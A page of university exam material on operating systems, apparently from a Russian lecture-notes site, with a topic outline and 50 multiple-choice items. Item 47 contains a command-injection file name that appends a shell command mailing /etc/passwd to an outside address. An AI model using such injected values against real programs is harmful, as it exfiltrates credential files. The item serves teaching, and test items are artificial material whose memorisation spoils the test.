Лекции.Орг


Поиск:




Категории:

Астрономия
Биология
География
Другие языки
Интернет
Информатика
История
Культура
Литература
Логика
Математика
Медицина
Механика
Охрана труда
Педагогика
Политика
Право
Психология
Религия
Риторика
Социология
Спорт
Строительство
Технология
Транспорт
Физика
Философия
Финансы
Химия
Экология
Экономика
Электроника

 

 

 

 


Тематическая структура АПИМ. N ДЕ Наименование дидактической единицы ГОС N за- да- ния Тема задания Основные понятия и

 

N ДЕ Наименование дидактической единицы ГОС N за- да- ния Тема задания
  Основные понятия и определения   Назначение и функции операционных систем
  Операционная среда
  Прерывания
  Процессы и потоки
  Файлы и файловые системы
  Память
  Пользователи
  Режимы работы
  Управление процессами   Концепция процесса
  Идентификатор, дескриптор и контекст процесса
  Иерархия процессов
  Диспетчеризация процессов
  Понятия приоритета и очереди процессов
  Синхронизация процессов
  Средства обработки сигналов
  Понятие событийного программирования
  Средства коммуникации процессов
  Способы реализации мультипрограммирования
  Управление памятью   Организация памяти. Адресное пространство
  Методы управления памятью
  Принципы организации виртуальной памяти
  Сегментная организация памяти
  Страничная организация памяти
  Ускорение работы страничной памяти
  Принципы замещения страниц
  Алгоритмы замещения страниц
  Управление вводом-выводом   Прерывания от внешних устройств
  Классификация устройств ввода-вывода
  Основные принципы организации ввода-вывода
  Функции супервизора ввода-вывода
  Режимы управления вводом-выводом
  Закрепление устройств, общие устройства ввода-вывода
  Основные системные таблицы ввода-вывода
  Синхронный и асинхронный ввод-вывод
  Организация внешней памяти на магнитных дисках
  Кэширование операций ввода-вывода при работе с накопителями на магнитных дисках
  Принципы построения и классификация   Принципы построения
  Ядро и ресурсы
  Интерфейсы операционных систем
  Классификация операционных систем
  Защита от сбоев и несанкционированного доступа   Анализ угроз и уязвимостей в операционных системах
  Основы криптографии
  Механизмы защиты
  Надежные вычислительные системы
  Методы аутентификации
  Инсайдерские атаки
  Внешние атаки
  Вредоносные программы
  Троянские кони и вирусы
  Средства защиты от вредоносных программ

Демонстрационный вариант

 

ЗАДАНИЕ N 1 (- выберите один вариант ответа) Для сетевых операционных систем характерной является функция обеспечения …
ВАРИАНТЫ ОТВЕТОВ:
1) прямого доступа к оперативной памяти другого компьютера   2) взаимодействия связанных между собой компьютеров
3) обмена сигналами между выполняющимися на разных компьютерах программами   4) программных каналов между разными компьютерами

 

 
ЗАДАНИЕ N 2 (- выберите один вариант ответа) Одна операционная система может поддерживать несколько …
ВАРИАНТЫ ОТВЕТОВ:
1) микропрограммных сред   2) операционных систем
3) микропрограммных систем   4) операционных сред

 

 

 

ЗАДАНИЕ N 3 (- выберите один вариант ответа) Термин "маскирование" означает запрет отдельных …
ВАРИАНТЫ ОТВЕТОВ:
1) сигналов прерывания   2) команд пользователя
3) процессов пользователя   4) команд процессора

 

 
ЗАДАНИЕ N 4 (- выберите один вариант ответа) Для реализации синхронизации на уровне языка программирования используются высокоуровневые примитивы, названные …
ВАРИАНТЫ ОТВЕТОВ:
1) супервизорами   2) мониторами
3) маркерами   4) семафорами

 

 

 

ЗАДАНИЕ N 5 (- выберите один вариант ответа) Относительный путь к файлу состоит из списка каталогов, которые нужно …
ВАРИАНТЫ ОТВЕТОВ:
1) пройти от рабочего каталога, чтобы добраться до файла   2) открыть в корневом процессе, чтобы добраться до файла
3) добавить в переменную PATH операционной среды   4) пройти от корневого каталога, чтобы добраться до файла

 

 
ЗАДАНИЕ N 6 (- выберите один вариант ответа) Свопингом сегментов называется перемещение …
ВАРИАНТЫ ОТВЕТОВ:
1) блоков файла между каталогами файловой системы   2) блоков данных между процессом и ядром операционной системы
3) сегментов данных между стеком и оперативной памятью   4) сегментов между оперативной и внешней памятью

 

 

 

ЗАДАНИЕ N 7 (- выберите один вариант ответа) Идентификатор пользователя представляет собой уникальное _______ значение
ВАРИАНТЫ ОТВЕТОВ:
1) составное   2) символьное
3) вещественное   4) целое

 

 
ЗАДАНИЕ N 8 (- выберите один вариант ответа) Мультитерминальный режим работы предполагает совмещение …
ВАРИАНТЫ ОТВЕТОВ:
1) привилегированного режима работы и режима пользователя   2) многопроцессорного режима работы и режима ввода-вывода
3) диалогового режима работы и режима мультипрограммирования   4) аналогового режима работы и режима микропрограммирования

 

 

 

ЗАДАНИЕ N 9 (- выберите один вариант ответа) Последовательная трансляция двух исходных программ является …
ВАРИАНТЫ ОТВЕТОВ:
1) одним последовательным процессом   2) двумя одинаковыми процессами
3) двумя разными процессами   4) одной последовательной задачей

 

 
ЗАДАНИЕ N 10 (- выберите несколько вариантов ответа) Идентификатор процесса является частью _____________ процесса.
ВАРИАНТЫ ОТВЕТОВ:
1) контекста   2) типа
3) дескриптора   4) описателя

 

 

 

ЗАДАНИЕ N 11 (- выберите один вариант ответа) В OS UNIX каждый новый процесс может быть образован (порожден) только …
ВАРИАНТЫ ОТВЕТОВ:
1) двумя из существующих процессов   2) несколькими родительскими процессами
3) четным количеством родительских процессов   4) одним из существующих процессов

 

 
ЗАДАНИЕ N 12 (- выберите один вариант ответа) Основное различие между долгосрочным и краткосрочным планированием (диспетчеризацией) заключается в …
ВАРИАНТЫ ОТВЕТОВ:
1) длительности выполнения   2) очередности выполнения
3) скорости выполнения   4) частоте выполнения

 

 

 

ЗАДАНИЕ N 13 (- выберите один вариант ответа) Приоритет, меняющейся во время исполнения процесса, называется _____________ приоритетом.
ВАРИАНТЫ ОТВЕТОВ:
1) фиксированным   2) циклическим
3) статическим   4) динамическим

 

 
ЗАДАНИЕ N 14 (- выберите один вариант ответа) При совместном использовании процессами аппаратных и информационных ресурсов вычислительной системы возникает потребность в …
ВАРИАНТЫ ОТВЕТОВ:
1) адаптации   2) синхронизации
3) оптимизации   4) буферизации

 

 

 

ЗАДАНИЕ N 15 (- выберите один вариант ответа) В операционной системе UNIX сигналы можно рассматривать как простейшую форму взаимодействия между …
ВАРИАНТЫ ОТВЕТОВ:
1) процессами   2) процессорами
3) сегментами   4) каналами

 

 
ЗАДАНИЕ N 16 (- выберите несколько вариантов ответа) Область эффективного применения событийного программирования начинается там, где возникают …
ВАРИАНТЫ ОТВЕТОВ:
1) трудности декомпозиции решаемой задачи, при которой генерация и обработка рассматриваются как объединенные процессы   2) возможности декомпозиции решаемой задачи, при которой генерация и обработка рассматриваются как объединенные процессы
3) необходимость использования графа перехода между состояниями   4) неудобство использования графа переходов между состояниями

 

 

 

ЗАДАНИЕ N 17 (- выберите один вариант ответа) Два параллельных процесса могут быть …
ВАРИАНТЫ ОТВЕТОВ:
1) взаимоисключающими   2) независимыми
3) критическими   4) коммутационными

 

 
ЗАДАНИЕ N 18 (- выберите один вариант ответа) Главной целью мультипрограммирования в системах пакетной обработки является …
ВАРИАНТЫ ОТВЕТОВ:
1) обеспечение удобства работы пользователей   2) минимизация простоев всех устройств компьютера
3) минимизация времени выполнения одной задачи   4) обеспечение реактивности системы

 

 

 

ЗАДАНИЕ N 19 (- выберите один вариант ответа) Учет участков свободной памяти с помощью связного списка свободных/занятых блоков позволяет …
ВАРИАНТЫ ОТВЕТОВ:
1) находить в памяти наиболее долго занятые участки   2) выделять участки памяти произвольных размеров
3) освобождать память, занятую неактивными процессами   4) перемещать процессы в памяти

 

 
ЗАДАНИЕ N 20 (- выберите один вариант ответа) Использование виртуальной памяти в однопрограммном режиме приводит к … процесса, если размер программы существенно больше объема доступной оперативной памяти
ВАРИАНТЫ ОТВЕТОВ:
1) аварийному завершению   2) ускорению
3) замедлению выполнения   4) перезапуску

 

 

 

ЗАДАНИЕ N 21 (- выберите несколько вариантов ответа) Виртуальная память позволяет …
ВАРИАНТЫ ОТВЕТОВ:
1) отказаться от предоставления прикладным процессам оперативной памяти   2) загружать множество небольших программ, суммарный объем которых больше объема физической памяти
3) загружать программы, размер которых превышает объем доступной физической памяти   4) загружать программы, скомпилированные для другого процессора

 

 
ЗАДАНИЕ N 22 (- выберите один вариант ответа) Сегментная организация памяти … отдельно скомпилированных процедур.
ВАРИАНТЫ ОТВЕТОВ:
1) состоит из   2) упрощает компоновку
3) невозможна без   4) усложняет компоновку

 

 

 

ЗАДАНИЕ N 23 (- выберите один вариант ответа) При страничной организации памяти таблица страниц может размещаться в …
ВАРИАНТЫ ОТВЕТОВ:
1) только в оперативной памяти   2) в оперативной памяти и на диске
3) только в процессоре   4) в специальной быстрой памяти процессора и в оперативной памяти

 

 
ЗАДАНИЕ N 24 (- выберите один вариант ответа) Страничная организация предназначена для …
ВАРИАНТЫ ОТВЕТОВ:
1) облегчения совместного использования процедур, библиотек и массивов данных   2) повышения уровня защиты программ и данных
3) получения большого адресного пространства без приобретения дополнительной физической памяти   4) логического разделения программ и данных

 

 

 

ЗАДАНИЕ N 25 (- выберите один вариант ответа) При страничном сбое и отсутствии свободных блоков физической памяти операционная система должна …
ВАРИАНТЫ ОТВЕТОВ:
1) выбрать страницу-кандидат на удаление из памяти и сохранить удаляемую страницу на диске   2) выбрать страницу-кандидат на удаление из памяти и сохранить удаляемую страницу на диске, если она претерпела изменения
3) выбрать страницу, которая не изменялась, и сохранить удаляемую страницу на диске   4) выбрать страницу-кандидат на удаление из памяти и сохранить копию удаляемой страницы в таблице страниц

 

 
ЗАДАНИЕ N 26 (- выберите один вариант ответа) Полная реализация алгоритма LRU (Least Recently Used) …
ВАРИАНТЫ ОТВЕТОВ:
1) теоретически невозможна   2) возможна при использовании стековой организации таблицы страниц
3) возможна при условии построения таблицы страниц в виде бинарных деревьев   4) практически невозможна

 

 

 

ЗАДАНИЕ N 27 (- выберите один вариант ответа) Запросы на ввод-вывод от супервизора задач или от программных модулей самой операционной системы получает _____________ ввода-вывода.
ВАРИАНТЫ ОТВЕТОВ:
1) контроллер   2) диспетчер
3) супервизор   4) процессор

 

 
ЗАДАНИЕ N 28 (- выберите один вариант ответа) Мыши (в качестве устройства-указателя) относятся к _____________ устройствам ввода-вывода.
ВАРИАНТЫ ОТВЕТОВ:
1) позиционируемым   2) символьным
3) адресуемым   4) блочным

 

 

 

ЗАДАНИЕ N 29 (- выберите один вариант ответа) Любые операции по управлению вводом-выводом объявляются …
ВАРИАНТЫ ОТВЕТОВ:
1) привилегированными   2) универсальными
3) приоритетными   4) уникальными

 

 
ЗАДАНИЕ N 30 (- выберите один вариант ответа) Супервизор ввода-вывода инициирует операции ввода-вывода и в случае управления вводом-выводом с использованием прерываний предоставляет процессор …
ВАРИАНТЫ ОТВЕТОВ:
1) супервизору прерываний   2) диспетчеру задач
3) задаче пользователя   4) супервизору программ

 

 

 

ЗАДАНИЕ N 31 (- выберите один вариант ответа) В режиме обмена с опросом готовности устройства ввода-вывода используется _____________ центрального процессора.
ВАРИАНТЫ ОТВЕТОВ:
1) рационально время   2) нерационально память
3) нерационально время   4) рационально память

 

 
ЗАДАНИЕ N 32 (- выберите один вариант ответа) Понятия «виртуального устройства» по отношению к понятию «спулинга» …
ВАРИАНТЫ ОТВЕТОВ:
1) соотносится как часть и целое   2) является более широким
3) является более узким   4) тождественно

 

 

 

ЗАДАНИЕ N 33 (- выберите один вариант ответа) Каждый элемент таблицы оборудования условно называется …
ВАРИАНТЫ ОТВЕТОВ:
1) UCB   2) USB
3) DCB   4) DRT

 

 
ЗАДАНИЕ N 34 (- выберите один вариант ответа) Для увеличения скорости выполнения приложений при необходимости предлагается использовать _____________ ввод-вывод.
ВАРИАНТЫ ОТВЕТОВ:
1) асинхронный   2) приоритетный
3) автоматический   4) синхронный

 

 

 

ЗАДАНИЕ N 35 (- выберите один вариант ответа) Программа, расположенная в главной загрузочной записи, называется _____________ загрузчиком.
ВАРИАНТЫ ОТВЕТОВ:
1) системным   2) внесистемным
3) начальным   4) локальным

 

 
ЗАДАНИЕ N 36 (- выберите один вариант ответа) Простейшим вариантом ускорения дисковых операций чтения данных можно считать использование двойной …
ВАРИАНТЫ ОТВЕТОВ:
1) кластеризации   2) буферизации
3) диспетчеризации   4) приоритезации

 

 

 

ЗАДАНИЕ N 37 (- выберите один вариант ответа) Операционная система реального времени должна обеспечивать …
ВАРИАНТЫ ОТВЕТОВ:
1) делегирование полномочий   2) наследование приоритетов
3) пакетную обработку   4) клонирование пользователей

 

 
ЗАДАНИЕ N 38 (- выберите один вариант ответа) К невыгружаемым относятся такие ресурсы, которые не могут быть …
ВАРИАНТЫ ОТВЕТОВ:
1) загружены в память   2) выгружены из памяти
3) отобраны у процесса   4) отобраны у процессора

 

 

 

ЗАДАНИЕ N 39 (- выберите один вариант ответа) Интерфейс прикладного программирования предназначен для использования прикладными программами …
ВАРИАНТЫ ОТВЕТОВ:
1) системных ресурсов компьютера   2) регистров общего назначения процессора
3) интерпретатора команд пользователя   4) адресного пространства процесса

 

 
ЗАДАНИЕ N 40 (- выберите несколько вариантов ответа) По режиму обработки задач различают операционные системы, обеспечивающие _________ режим
ВАРИАНТЫ ОТВЕТОВ:
1) мультипрограммный   2) виртуальный
3) однопрограммный   4) многопользовательский

 

 

 

ЗАДАНИЕ N 41 (- выберите один вариант ответа) Угроза зомби реализуется с помощью … и заставляет компьютер выполнять приказания других лиц.
ВАРИАНТЫ ОТВЕТОВ:
1) вызова утилит операционной системы   2) диспетчера приложений
3) вредоносных программ   4) подбора пароля

 

 
ЗАДАНИЕ N 42 (- выберите один вариант ответа) Недостаток систем шифрования с секретным ключом состоит в том, что …
ВАРИАНТЫ ОТВЕТОВ:
1) отправитель сообщения не может его расшифровать   2) отправитель и получатель должны иметь общий секретный ключ
3) объем вычислений при дешифровании намного больше, чем при шифровании   4) объем вычислений при шифровании намного больше, чем при дешифровании

 

 

 

ЗАДАНИЕ N 43 (- выберите один вариант ответа) Объектами защиты в компьютерных системах могут быть …
ВАРИАНТЫ ОТВЕТОВ:
1) устройства отображения информации   2) помещения
3) сотрудники   4) программы

 

 
ЗАДАНИЕ N 44 (- выберите один вариант ответа) Политика принудительного управления доступом (mandatory access control) возлагает полномочия по назначению прав доступа к файлам и другим объектам на...
ВАРИАНТЫ ОТВЕТОВ:
1) пользователей   2) прикладную программу
3) операционную систему   4) руководителей подразделений

 

 

 

ЗАДАНИЕ N 45 (- выберите один вариант ответа) Защита зашифрованных паролей в UNIX взламывается путем …
ВАРИАНТЫ ОТВЕТОВ:
1) шифрования множества потенциальных паролей открытым алгоритмом шифрования и поиска совпадений в файле паролей   2) привлечения инсайдеров в качестве сообщников
3) расшифровки всех паролей после копирования файла паролей   4) вычисления пароля путем свертки идентификатора пользователя

 

 
ЗАДАНИЕ N 46 (- выберите один вариант ответа) Лазейки в программах создаются …
ВАРИАНТЫ ОТВЕТОВ:
1) для облегчения отладки программ или в противоправных целях   2) только для противоправных целей
3) для внедрения в программу постороннего кода   4) только для облегчения отладки программ

 

 

 

ЗАДАНИЕ N 47 (- выберите один вариант ответа) Программа, выполняющая копирование файла путем системного вызова, запрашивает у пользователя имена файла-источника и файла-приемника. Злоумышленник ввел в качестве имен файлов следующие значения: “aaa” и “bbb; mail goofinator@mail.ru </etc/passwd”. Какие действия выполнит система?
ВАРИАНТЫ ОТВЕТОВ:
1) Скопирует файл aaa в bbb отправит файл bbb адресату goofinator@mail.ru.   2) Отправит файл aaa адресату goofinator@mail.ru.
3) Скопирует текст aaa в файл паролей, относящийся к пользователю с идентификатором goofinator@mail.ru.   4) Скопирует файл aaa в bbb и отправит по электронной почте файл паролей адресату goofinator@mail.ru.

 

 
ЗАДАНИЕ N 48 (- выберите один вариант ответа) Наиболее популярное применение ботнетов (сети зараженных компьютеров) - это …
ВАРИАНТЫ ОТВЕТОВ:
1) организация сетевых азартных игр   2) распространение пиратского контента
3) рассылка коммерческого спама   4) хищение денег с кредитных карт

 

 

 

ЗАДАНИЕ N 49 (- выберите один вариант ответа) Перезаписывающий вирус заражает исполняемую программу путем …
ВАРИАНТЫ ОТВЕТОВ:
1) записи кода вируса в тело зараженной программы после каждого ее вызова   2) перезаписи содержимого стека программы кодом вируса
3) перезаписи служебных секторов дисков   4) записи вируса на место кода программы

 

 
ЗАДАНИЕ N 50 (- выберите один вариант ответа) Обнаружить зашифрованный вирус можно...
ВАРИАНТЫ ОТВЕТОВ:
1) с помощью универсальной программы дешифрования   2) по характерному поведению зараженной программы при запуске
3) по сигнатурам кода процедур расшифровки вируса   4) по изменению размера программы

 

 

 

 

 



<== предыдущая лекция | следующая лекция ==>
 | 
Поделиться с друзьями:


Дата добавления: 2016-11-12; Мы поможем в написании ваших работ!; просмотров: 312 | Нарушение авторских прав


Поиск на сайте:

Лучшие изречения:

Лаской почти всегда добьешься больше, чем грубой силой. © Неизвестно
==> читать все изречения...

2358 - | 2221 -


© 2015-2024 lektsii.org - Контакты - Последнее добавление

Ген: 0.009 с.